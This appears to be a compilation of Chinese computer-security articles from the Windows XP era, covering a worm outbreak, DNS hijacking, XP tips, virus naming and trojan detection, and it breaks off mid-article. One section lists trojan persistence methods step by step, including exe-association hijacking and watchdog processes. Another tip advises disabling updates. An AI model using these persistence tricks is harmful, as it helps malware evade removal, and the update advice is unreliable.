　　据介绍，“魔波”病毒会自动在网络上搜索具有系统漏洞的电脑，并直接引导这些电脑下载病毒文件和执行。只要用户的电脑没有安装补丁程序并接入互联网，就有可能被感染。被感染病毒的计算机可接受黑客的远程控制命令，除了造成断网的故障，黑客还有可能盗取用户的银行卡账号、密码及其他隐私信息。

　　“我们已经发布了重大病毒预报，”吴恩平透露，针对这个病毒，除了使用杀毒软件进行查杀，更重要的是下载安装微软提供的补丁程序，把安全漏洞“堵上”。

　　微软公司：该安全漏洞危险级别为最高级

　　按照上海电信提供的链接地址，记者登陆到微软公司的安全公告网站。微软公司在安全公告网站上披露代号为ms-06-040的漏洞严重等级为“严重”。“这是最高的严重级别，”微软公司客户服务与反馈中心的相关人员表示，存在这个漏洞的电脑目前呈现的症状就是“上网会出现中断、拨号软件锁死、无法响应”。

　　微软公司在其安全公告网站上指出，成功利用此漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新账户。微软是本月8日发布该安全漏洞及相关的补丁软件信息，并在网站上建议用户“立即应用此更新”。

DNS解析被篡改动机何在

　　前天在 qq 群接到 365.com 的一位叫 fm165 的消息，问我们 265.com 是否被人攻击了，流量都倒流到他们那里去了，仅发现当天没多久就已经有超过20万的流量过去了。

　　后经确认，除了 265.com 上网导航外，一些流量较大的网站也发生了此类现象，比如做统计的 51yes.com 还有一些做广告联盟的网站。我们厦门的同事使用厦门电信的 dns 测试 265.com 达到了1/5的出错率。dodo 的机器上使用北京网通的 dns 发生过 yok.com 解析错误。

　　此次 dns 被篡改的现象和可能有以下几种情况：

　　1、当 dns 解析过程中没有缓存而连接节点又失败时，返回默认 ip 地址，此类方式多见于搜索引擎、网络实名、通用网址、中文域名等合作项目；

　　2、根据当地法律法规和政策，某些域名和主机被禁止访问，解析过程中则得不到真正的 ip 地址，一般是返回访问不了的伪造 ip 地址；

　　3、域名运营商将过期但尚未进入删除期的域名的 dns 修改成域名停放服务或催缴费页面，早年 nsi 甚至将没注册的域名也解析到他们的网站，后来被抗议而停止了服务；

　　4、机器被木马或病毒入侵，篡改 dns 解析或修改 hosts 文件得到的效果，但这种和上面提到的不是一回事，也不是一个级别的；

　　5、某些黑客入侵了电信运营商的路由或 dns 服务器或同一网段的机器，自行修改解析配置文件或篡改网络数据包等行为，已经属于严重的网络犯罪行为；

　　6、电信运营商的员工私底下收钱，偷偷修改了 dns 配置，和第1种方法相似，但是影响范围能在这么多城市，有些不符合常理。

　　目前很难断定在哪个环节出了问题，第1种方法合作费用很高，谁会用来做损人不利已的事情？虽然说 365 是受益者，但是 365 自己没有此类合作，谁会把流量送给他们呢？也说 365 是受害者，因为像 265 这种流量过去后他们的服务器压力提升上来，从另一个角度他们应该偷着笑，为何又主动找到我们呢？第2种方法也不吻合，因为那种情况发生时，所有当地用户都无法访问，而不会只影响一小部分。第3种方法更不可能发生在流量这么大的 265 身上。第4种已经证实不是，因为在干净的机器或服务器上，使用 nslookup 查询证明确是 dns 问题而非本机问题。第5种方法倒是能有想象空间，只是能影响厦门、上海、北京等城市，看来是一个不小的僵尸网络。第6种方法也是有可能，但并不符合常理。

让Windows XP更安全的超级必杀技

让Windows XP更安全的超级必杀技

大家使用Windows XP已经有很长一段时间了，对与Windows XP操作系统已经是非常熟悉了吧！有没有总结出一些的经验来与大家共享呢？下面笔者就把在使用Windows XP操作系统过程中积累的一些经验共享出来，也便能让你在使用Windows XP操作系统的过程中能快速上手。熟练的掌握XP的使用技巧就能更好的享受XP系统带给你的强大功能。

　　1、恢复被破坏的Win XP系统文件

　　如果Windows XP的系统文件被病毒或其它原因破坏了，我们可以从Windows XP的安装盘中恢复那些被破坏的文件。

　　具体方法：在Windows XP的安装盘中搜索被破坏的文件，需要注意的是，文件名的最后一个字符用底线“_”代替，例如：如果要搜索“Notepad.exe”则需要用“Notepad.ex_”来进行搜索。

　　搜索到了之后，打开命令行模式（在“运行”中输入“cmd”），然后输入：“EXPAND 源文件的完整路径 目标文件的完整路径”。例如：EXPAND D:\SETUP\NOTEPAD.EX_ C:\Windows\NOTEPAD.EXE。有一点需要注意的是，如果路径中有空格的话，那么需要把路径用双引号（英文引号）包括起来。

　　找到当然是最好的，但有时我们在Windows XP盘中搜索的时候找不到我们需要的文件。产生这种情况的一个原因是要找的文件是在“CAB”文件中。由于Windows XP把“CAB”当作一个文件夹，所以对于Windows XP系统来说，只需要把“CAB”文件右拖然后复制到相应目录即可。

　　如果使用的是其他Windows平台，搜索到包含目标文件名的“CAB”文件。然后打开命令行模式，输入：“EXTRACT /L 目标位置 CAB文件的完整路径”，例如：EXTRACT /L C:\Windows D:\I386\Driver.cab Notepad.exe。同前面一样，如同路径中有空格的话，则需要用双引号把路径包括起来。 　　

　　2、拒绝“分组相似任务栏”

　　虽然Windows XP “分组相似任务栏按钮”设置虽然可以让你的任务栏少开窗口，保持干净，但对于一些需要打开同类多个窗口的工作非常不便,。如你是经常用QQ这样的通讯软件和人在线聊天的话，如果有两个以上的好友同时和你交谈，你马上会感到XP这种默认设置造成的不便 D D每次你想切换交谈对象的时候，要先点击组，然后弹出的菜单里再选要交谈的好友，而且每个好友在组里显示的都是一样的图标，谈话对象多的时候，你可能要一个个的点击来看到底刚才是谁回复了话，在等着你反应，而且选错了一个，又得从组开始选，很麻烦。显然地，这样不如原来的开出几个窗口，在任务栏里的各个小窗口点击一次就可进行开始聊天。更改方法：点击“开始→控制面板→外观和主题→任务栏和‘开始’菜单”，在弹出的窗口内，将“分组相似任务栏按钮”选项前面的钩去掉。

　　3、通过注册表卸载无用的动态链接

　　资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\EXPlorer\AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。注意：为了让设置生效，需要重新启动计算机。

　　4、清除prefetch文件夹中的预读文件

　　当Win XP使用一段时间后，预读文件夹里的文件会变得很大，里面会有死链文件，这会减慢系统时间。建议：定期删除这些文件。(Windows\prefetch) 　　

　　5、Windows XP减肥法

　　以下方法为本人目前的winXP的减肥法，经过使用，觉得比较安全，效果明显，至少可以减少300m空间。注意：不建议初学者使用。

　　删除驱动备份： Windows\Driver cache\i386目录下的Driver.cab文件(73MB) 但是以后我们每次安装新硬件时必须插入Windows的安装光盘。

　　删除系统文件备份(一般不怎么用到的): 运行命令行sfc /purgecache

　　删掉备用的dll文件： 只要你拷贝了安装文件或者有安装光盘，可以这样做。Windows\system32\dllcache下文件(减去200——300mb)。

　　6、了解Win XP启动时间

　　尽管Windows XP的启动速度已经能让我们感到满意了，但微软仍然为我们提供了一款用于了解的Windows XP启动时具体所消耗启动时间的小工具，以及查看CPU的使用率、Disk I/O等等，由于该工具用图形的方式显示出来，因此一目了然。工具可到此处下载。

　　7、恢复EXE文件关联

　　EXE文件关联出错非常的麻烦，因为这种情况的出现多是由于病毒引起的，而杀毒软件的主文件都是EXE文件，既然EXE文件关联出错，又怎能运行得了杀毒软件呢？还好XP提供了安全模式下的命令行工具供我们使用，可以利用命令行工具来解决这个问题。

　　在安全模式下输入：assoc.exe=exefile，屏幕上将显示“.exe=exefile”。现在关闭命令提示符窗口，按Ctrl+Alt+Del组合键调出“Windows安全”窗口，按“关机”按钮后选择“重新启动”选项，按正常模式启动Windows后，所有的EXE文件都能正常运行了！

　　8、让Win XP能自动更新

　　当Windows 有了更新时，自动更新系统会提示你进行Windows的升级工作，当然这项功能会在上网之后才会有真正的效果。有一点可以肯定的就是，要想实现自动更新，系统必定会收集用户的电脑信息，然后传送到微软站点，通过反馈信息来决定是否要进行升级工作。这项设置也是在“系统属性”窗口，切换到“自动更新”选项卡可以看到这里有三个选择，选了最后一个“关闭自动更新”，这样系统就不会出现经常提示你进行自动更新了，如果你没用正版的Windows XP操作系统，建议你关闭此功能，因为他可能会让你在不知道的情况就把系统升级至Windows XP SP2版，这样会造成系统的不稳定。

　　9、在Home版中安装IIS

　　大家知道，Windows XP Home版不能安装IIS或者PWS。按照一般的方法，你只能升级到XP Professional或者使用Windows 2000，不过只要略使手段，你就可以在Windows XP Home上安装IIS了。

　　首先在“开始”菜单的“运行”中输入“c:＼Windows＼inf＼sysoc.inf”，系统会自动使用记事本打开sysoc.inf这个文件。在sysoc.inf中找到“[Components]”这一段，并继续找到类似“iis=iis.dll,OcEntry,iis.inf,hide,7”的一行字，把这一行替换为“iis=iis2.dll,OcEntry,iis2.inf,,7”。之后保存并关闭。

　　把Windows 2000 Professional的光盘插入光驱，同时按下Shift键禁止光驱的自动运行。在运行中输入“CMD”然后回车，打开命令行模式，在命令行下输入下列的两条命令，在每一行命令结束后回车(假设光驱是D盘)：

　　EXPand d:＼i386＼iis.dl_ c:＼Windows＼system32＼setup＼iis2.dll

　　EXPand d:＼i386＼iis.in_ c:＼Windows＼inf＼iis2.inf

　　这时，打开你的控制面板，并点击“添加删除程序”图标，之后点击“添加删除Windows组件”。

　　请仔细看，在“开始”菜单中显示的操作系统是Windows XP Home，但是经过修改，已经有了添加IIS的选项了。

　　然后你可以按照在Windows XP Professional或者Windows 2000中的方法添加IIS，在本例中我们只安装了WWW服务。系统会开始复制文件，这需要一些时间。并且在这起见，请保持Windows 2000 Professional的光盘还在光驱中。

　　在安装结束后，你可以打开“控制面板→性能和选项→管理工具”，“Internet信息服务管理”已经出现在那里。

　　如果你想要验证IIS是否运行正常，而已打开IE，在地址栏中输入“http://localhost”然后回车，如果能看到图三的界面，那么你的IIS就全部正常运行了。

　　最后还有一点注意的：如果你在安装过程中，系统需要你插入Window Whistler CD或者需要你提供exch_adsiisex.dll这个文件，那是因为你按照默认的选项安装了IIS。要解决这个问题，只要在安装IIS的时候先点击“详细信息”，然后取消对SMTP的选择(即不要安装SMTP服务器)，那么复制文件的时候就不会需要那两个文件了。

　　如果在你安装的到图1的位置后发现，已经显示了Internet信息服务(IIS)的安装项目，但是它们根本无法被选中，那很可能因为你使用的iis.dl_和iis.in_是从Windows XP Professional中取出的，只要换成Windows 2000 Professional中的就可以继续正常安装了。

　　经过验证，WWW、FTP等几个服务经过这样的修改都可以在Windows XP Home上正常运行。

下载更为安全 让迅雷杀毒也与时俱进

迅雷 【转载】 作者：书虫

众所周知，目前杀毒软件绝大多数是通过升级病毒库来提升病毒的查杀能力。迅雷5中的安全组件给大家带来了很多的便利和安全体验。但可惜的是，先前的版本并不能更新病毒库。这在病毒、木马等“高速发展”的今天对大家的下载安全只能起到有限的保护。不过，现在迅雷的工程师们已经开发出了1.0.1.17版的安全组件，有了它，我们就可以让迅雷5与时俱进，全面提升查毒能力。

第一步：更新杀毒软件

事实上，要让迅雷杀毒实现病毒库更新，首先要升级其内置的杀毒软件。

1.自动安装

只要使用的是迅雷5.5.6.274以上版本（非BT版本），在启动后会弹出提示让我们安装此组件。

2.更新安装

如果未提示安装，我们只要选择“帮助”→“检查更新”命令，之后即可提示并安装此组件。

3.手动安装

也可以打开迅雷，新建任务，然后输入如下地址来下载：thunder://QUFodHRwOi8vcGRvd24ueC00YjgwMzUzYS5jb20va2F2c2V0dXAxMDExNy5leGU/ZmlkPXhEK0l5T0Q2MHp1TG96SEUvY3dNK0FDV2U5YUkyYllBQUFBQUFOQWZ4R09GSVFVNG90ZTBwclZrSHMwS1A4OXgmbWlkPWEwYTE0MmJkZmRlMzZmMjQ0NmQ0OTRkOTQ4ZjY2NjdlJnRocmVzaG9sZD0xNTAmdGlkPTkwNEIzMTU4RDFDOURDQjg3REMzQjIwMzRCQjE3QUQ2Wlo=

之后，双击下载下的kavsetup10117.exe，即可完成安装。在安装时一定要注意安装目录，将其安装在迅雷5的安装文件夹下，一般是C:\Program Files\Thunder Network\Thunder（如图1）。如果你的迅雷5安装在其他位置，则请一并作更改。



图1

第二步：让其自动病毒库更新

选择“组件”→“组件管理”，再选中“迅雷安全下载组件”，单击下方的“配置”按钮，可以在打开的窗口中进行相应设置，如选中“仅在发现病毒时提示”项（如图2），卡巴斯基如果检测该下载资源中包含有病毒、木马或插件，则不会弹出相应的窗口，从而节省我们的精力和时间。



图2

在这里最有用的是“检查更新策略”，如果我们的机器性能比较好，可以选择为“即时”，一般选为“每天”。只要是“每天”，我们的迅雷在启动时就会自动更新病毒库。

第三步：享受“最新”安全下载

现在我们就可以放心地去下载网上的资源了，下载后的资源，迅雷会自动检测其中会不会有木马、病毒或插件。如果有则会，则会出现如图3所示的窗口，告诉我们木马、病毒或插件的名称，并告诉清除的结果。同时在下方允许我们对该资源进行相应的处理。



图3

第四步：即时手工更新病毒库

虽然我们只要选择了检查更新策略为“每天”，迅雷在启动时就会自动更新病毒库。但如果在图3窗口中发现病毒库日期较旧，可以选择“组件”→“组件管理”，再选中“迅雷安全下载组件”，单击下方的“配置”按钮，可以在打开的窗口中单击“立刻检查更新”链接即可立即进行病毒库的升级（如图4）。



图4

怎么样，有了支持病毒库更新的迅雷5下载，现在上网下载东西再也不用胆战心惊了吧！

防范在先 关于电脑病毒基础知识的识别

防范在先 关于电脑病毒基础知识的识别

作者：lvvl　来源：赛迪网安全社区

很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等翟烩些一串英文还带数字的病毒名，这时有些人就懵了，那么长一串的名字，我怎么知道是什么病毒啊?

　　其实只要我们掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

　　世界上那么多的病毒，反病毒公司为了方便管理，他们会按照病毒的特性，将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样，但大体都是采用一个统一的命名方法来命名的。

　　一般格式为：<病毒前缀>.<病毒名>.<病毒后缀> 。

　　病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的白菏?Worm 等等还有其他的。

　　病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“CIH”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。

　　病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如Worm.Sasser.b就是指 振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多(也表明该病毒生命力顽强 )，可以采用数字与字母混合表示变种标识。

　　综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识，这不在本文讨论范围)。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。

　　下面附带一些常见的病毒前缀的解释(针对我们用得最多的Windows操作系统)：

　　1、系统病毒

　　系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染Windows操作系统的 *.exe 和 *.dll 文件，并通过这些文件进行传播。如CIH病毒。

　　2、蠕虫病毒

　　蠕虫病毒的前缀是：Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波(阻塞网络)，小邮差(发带毒邮件) 等。

　　3、木马病毒、黑客病毒

　　木马病毒其前缀是：Trojan，黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ，还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如：网络枭雄(Hack.Nether.Client)等。

　　4、脚本病毒

　　脚本病毒的前缀是：Script。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码(Script.Redlof)——可不是我们的老大代码兄哦。脚本病毒还会有如下前缀：VBS、JS(表明是何种脚本编写的)，如欢乐时光(VBS.Happytime)、十四曰(Js.Fortnight.c.s)等。

　　5、宏病毒

　　其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：Macro.Word97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：Macro.Word；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：Macro.Excel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：Macro.Excel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎(Macro.Melissa)。

　　6、后门病毒

　　后门病毒的前缀是：Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。

　　7、病毒种植程序病毒

　　这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

　　8、破坏性程序病毒

　　破坏性程序病毒的前缀是：Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

　　9、玩笑病毒

　　玩笑病毒的前缀是：Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼(Joke.Girlghost)病毒。

　　10、捆绑机病毒

　　捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。

　　以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

　　DoS：会针对某台主机或者服务器进行DoS攻击；

　　Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

　　HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。

　　你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况，达到知己知彼的效果。在杀毒无法自动查杀，打算采用手工方式的时候这些信息会给你很大的帮助。

【支招】主流计算机病毒对系统有哪些破坏方式

电脑病毒激发后，就可能进行破坏活动，轻者干扰屏幕显示，降低电脑运行速度，重者使电脑软硬盘文件、数据被肆意篡改或全部丢失，甚至使整个电脑系统瘫痪。

　　常见的破坏方式有：

　　(1)删除磁盘上特定的可执行文件或数据文件。

　　(2)修改或破坏文件中的数据。

　　(3)在系统中产生无用的新文件。

　　(4)对系统中用户储存的文件进行加密或解密。

　　(5)毁坏文件分配表。

　　(6)改变磁盘上目标信息的存储状态。

　　(7)更改或重新写入磁盘的卷标。

　　(8)在磁盘上产生“坏”的扇区，减少盘空间， 达到破坏有关程序或数据文件的目的。

　　(9)改变磁盘分配，使数据写入错误的盘区。

　　(10)对整个磁盘或磁盘的特定磁道进行格式化。

　　(11)系统空挂，造成显示屏幕或键盘的封锁状态。

　　(12)影响内存常驻程序的正常运行。

　　(13)改变系统的正常运行过程。

　　(14)盗取有关用户的重要数据。

　　总之，病毒是程序，它能够做程序所能做的一切事情。

　　然而，电脑病毒的本质是程序，它也只能做程序所能做的事，并不是无所不能的，它不可能侵入未开机的RAM，也不可能传染一个贴上“写保护”的软盘(除非软盘驱动器物理故障)，也不能破坏主机板、烧毁电源，病毒并不是硬件故障和软件问题的“替罪羊”。

杀毒软件新功能：上班不许玩游戏！

驱动之家 【转载】 作者：且听枫吟

INQ报道——反病毒公司Sophos表示，从下周开始，使用其安全软件的公司将可以获得一个新功能——禁止员工在PC上运行著名模拟养成”浪费时间“游戏《Second Life》。

Sophos表示，他们在访问了450个系统管理员后发现，90％企业用户希望能够禁止员工在工作时间私自运行游戏。根据Sophos的说法，《Second Life》为IT安全领域打开了一系列安全隐患后门。

Sophos声称，黑客已经开始将目光投向《Second Life》——去年九月，一个包含65万用户的数据库被盗窃。

详尽解析关于木马后门程序的运行原理

详尽解析关于木马后门程序的运行原理

作者：smtk　来源：赛迪网安全社区

由于很多新手对安全问题了解不多，所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理，这样就会很容易发现“木马”。

“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False、 ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。

当然它也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是 “木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。

在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是 “explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY-LOCAL-MACHINE\Software\ Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE。

这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run”下的Explorer 键值改为Explorer=“C:\WINDOWS\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。

当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY-CURRENT-USER\Software\Microsoft\ Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\ CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\ Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

小知识：“木马”原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪。

【知识】木马驻留系统的方式集合

第一招：利用系统启动文件

1 注册表 CurrentUser \ SoftWare \ Microsoft \ Windows \ CurrentVersion \ 下的所有run有关的子键

2 注册表 LocalMachine \ SoftWare \ Microsoft \ Windows \ CurrentVersion \ 下的所有run有关的子键

3 注册表 CurrentUser \ SoftWare \ Microsoft \ Windows NT \ CurrentVersion \ 键名为load的字符型数据

4 注册表 LocalMachine \ SoftWare \ Microsoft \ Windows NT \ CurrentVersion \ 键名为load的字符型数据

第二招：关联类型文件使木马运行

在业内著名的木马冰河就是这样启动的，它关联的是exe类型的文件，方法如下：（以下方法是我在我的win2003中测试通过的）

注册表 ClassRoot 下的.exe 文件打开方式为exefile，我们就找到exefile子键，然后exefile该键下有一个shell子键，在shell子键下有open子键，在open下有command子键，command里有default键,value为"%1" %* 我们把它改变为 木马路径 "%1" %* 就可以了

当然win2000 或 win98中是不一样的 我刚才测试了 冰河作者看来也是心狠手辣啊

第三招：文件捆绑使木马运行

捆绑和关联文件不同，关联是修改注册表，但捆绑类似于病毒的“感染”，就是把木马的进程感染到其他的执行文件上，业内著名木马“网络公牛 - Netbull”就是利用这种方法进行启动。

网络公牛服务端名称newserver.exe,运行后自动脱壳到c:\windows\system\checkdll.exe目录下，下次开机自动运行,同时服务端在运行时会自动捆绑以下文件：

win9x: notepad.exe write.exe regedit.exe winmine.exe winhelp.exe

winnt: notepad.exe regedit.exe reged32.exe drwtsn32.exe winmine.exe

并且自动搜索系统启动项程序，捆绑之。比如qq.exe realplay.exe

除非把以上文件全部删除，否则无法清除，但系统文件删除后系统就无法正常运行，所以大多数人只能重装系统。确实牛。

第四招： 进程保护

两个木马进程，互相监视，发现对方被关闭后启动对方。技术其实不神秘，方法如下：

while (true)

{

System.Threading.Thread.Sleep(500);

//检查对方进程是否关闭，关闭的话再打开。

}

第五招：巧用启动文件夹

开始菜单的启动文件夹内的文件在系统启动后会随系统启动，假如将一个exe文件或exe文件的快捷方式复制到启动文件夹内，太明显，但设置隐藏属性后不会被系统启动。

有一个办法，将启动文件夹改名为启动a,并将该文件隐藏，然后再新建一个启动文件夹，将原启动文件夹内的所有内容复制到新建的启动文件夹，这样就可以了。（其实系统还是会启动原来的启动文件夹内的内rogn，也就是现在被改为"启动a"的文件夹，而现在我们新建的"启动"文件夹只是一个摆设而已，因为在这里的"启动a"对应着注册表local_machine\software\microsoft\windows\currentversion\explorer\startmenu内的common startup键值，当我们更该原来系统的启动文件夹的名字为"启动a"的时候该键值也会改为“C:\Documents and Settings\All Users\开始\Programs\启动a”）

另外可在local_machine\software\microsoft\windows\currentversion下建立RunServices子键来实现自启动，和run不同，run是系统启动后加载,runservices是系统登录时就启动

在系统根目录下放置Explorer.exe文件，在Explorer.exe文件中去启动正常的Explorer.exe文件，可以在C盘和D盘下都放上。

教你识辨几个容易被误认为病毒的文件

赛迪网安全社区 【转载】 作者：EvilBug

随着计算机的普及和信息技术的发展，“计算机病毒”一词对每一个人来说都已经不再陌生了，现如今计算机病毒可谓层出不穷，甚至让广大计算机用户几乎到了“谈毒色变”的程度。江民公司技术工程师发现有许多用户对操作系统下的文件不是很了解了解，以至于产生种种的怀疑。以下是用户经常怀疑是病毒的文件:

一、Thumb.db文件

Thumb.db文件被用户误认为是病毒的原因应该有三点：

1、该文件在一些操作系统中的带有图片的文件夹中都存在；

2、即使删除此文件，下次打开该文件夹时仍会生成；

3、该文件可能会不断增大。

其实，Thumb.db文件在Windows Me或更新的Windows版本中都会有，这是Windows对图片的缓存(也可以说是缓冲文件)，它可以方便用户对图片进行预览，图片越多，这个文件可能就越大，这是正常的。在Windows XP系统下可以在“文件夹选项”里面选择“不缓存缩略图”，就不会产生这种文件了。

二、Mfm1992文件 或“Mfm1992.AVB.AVB.AVB.AVB(后缀是无穷AVB)”

Mfm1992文件用户误认为是病毒的主要原因应该是:此文件可能生成在任何一个文件夹中，而且删除后可能还会重新生成。

Mfm1992文件是由于智能ABC的词库出错而产生的一个文件。由于智能ABC输入法的词库容量有限，当超出这个容量的时候，就会产生这个文件。当前程序运行在哪个目录，这个文件就在该目录下产生。这个文件的大小一般为43KB。这是智能ABC4.0的一个Bug，Win2000和me中自带的智能 ABC5.0已经修正了这个错误。

如果想让计算机中不再出现这个文件，有两种办法:

1、可以把4.0的智能ABC升级至高版本。

2、可以把Windowssystem目录下的*.rem文件删除，然后重启计算机。

三、Word的临时文件

用户在打开一个Word文档时会发现在同一个目录下出现了一个与原文档名称相同但前面加了一个“~$”符号的文件，它的图标与Word文档的图标相同，但是“灰”颜色的(即具有隐藏属性)。许多用户觉得可疑，认为是病毒造成的。

其实这是一个正常的现象，这个文件是Word生成的，可以理解为是一个缓冲文件，它的作用是最大限度的保存由于意外原因(如突然死机等)造成的用户对修改或建立的Word文档在未进行保存时的损失。其实这个文件在关闭了Word文档后即会自动消失，用户不必担心。

四、jdbgmgr.exe文件

与以上几种文件不一样，该文件即不是出错时生成的文件也不是临时文件，是一个正常的系统文件。用户本来是注意不到它的，因为它存在于系统目录下。但很多用户把它认为是病毒的原因是由于一封具有欺骗性的电子邮件在网上四处散发。这封被伪装成一份病毒防治报告的电子邮件，对收到邮件的用户发出警告，声称 “jdbgmgr.exe”文件是一种病毒，可以在感染PC两周后损害整个电脑系统。这一谎言被许多相信自己已经被感染的PC用户四处散发，希望能帮助其他受害者清除这个病毒。

实际上，“jdbgmgr.exe”文件是Java调试管理器，是所有Windows系统中所安装Java软件的一个组成部分。该文件一旦被删除之后，可能会导致一些Javaapplets和JavaScript停止工作。

威金Viking(logo1_ rundl132)变种清除史上最完美攻略-专杀整合!

Viking变种清除史上最完美攻略(转)

熊猫疯狂的时候..威金就已经被淡化..现在又出来了..

又一大祸害..据说台湾也很盛行..

以前一直在更新 农夫 的威金专杀..现在再次更新起来..

以下提供的专杀..使用如果出现问题我不负责(排除官方专杀) 农夫 的威金专杀..如果有问题完全可以找我..

注:

